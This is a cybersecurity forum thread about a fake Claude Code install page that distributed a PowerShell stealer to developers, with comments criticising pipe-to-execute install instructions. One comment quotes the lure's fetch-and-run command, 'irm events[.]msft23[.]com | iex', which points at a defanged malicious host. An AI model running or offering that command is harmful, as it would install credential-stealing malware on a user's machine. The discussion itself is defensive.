this post was submitted on 12 May 2026
8 points (100.0% liked)

Cybersecurity

9966 readers
157 users here now

c/cybersecurity is a community centered on the cybersecurity and information security profession. You can come here to discuss news, post something interesting, or just chat with others.

THE RULES

Instance Rules

Community Rules

If you ask someone to hack your "friends" socials you're just going to get banned so don't do that.

Learn about hacking

Hack the Box

Try Hack Me

Pico Capture the flag

Other security-related communities !databreaches@lemmy.zip !netsec@lemmy.world !securitynews@infosec.pub !cybersecurity@infosec.pub !pulse_of_truth@infosec.pub

Notable mention to !cybersecuritymemes@lemmy.world

founded 2 years ago
MODERATORS
kid@sh.itjust.works
Lanky_Pomegranate530@midwest.social
8
Fake Claude Code Page Pushes PowerShell Stealer at Devs - Infosecurity Magazine (www.infosecurity-magazine.com)
submitted 2 days ago by kid@sh.itjust.works to c/cybersecurity@sh.itjust.works
2 comments fedilink hide all child comments
top 2 comments
sorted by: hot top controversial new old
[–] sylver_dragon@lemmy.world 2 points 1 day ago (1 children)

Jumping over to the original report:

While the canonical command is “irm https[:]//claude[.]ai/install.ps1 | iex”, the lure replaced the destination host with “irm events[.]msft23[.]com | iex”.

Whatever artificially intelligent person at Anthopic decided that the official install method for Claude Code should be an irm piped to an iex in PowerShelll should be dragged out behind the same woodshed as Old Yeller. That is basically screaming "malicious code" at security tools. And it's training developers that blindly running code from the internet is a-ok. It's no wonder I've already seen exactly this sort of thing (with a different URL) happen in my environment. It's like the AI companies are trying to make security worse.

[–] UnfortunateShort@lemmy.world 1 points 1 day ago

Claude Code is utter garbage. The VSC extension is okay tho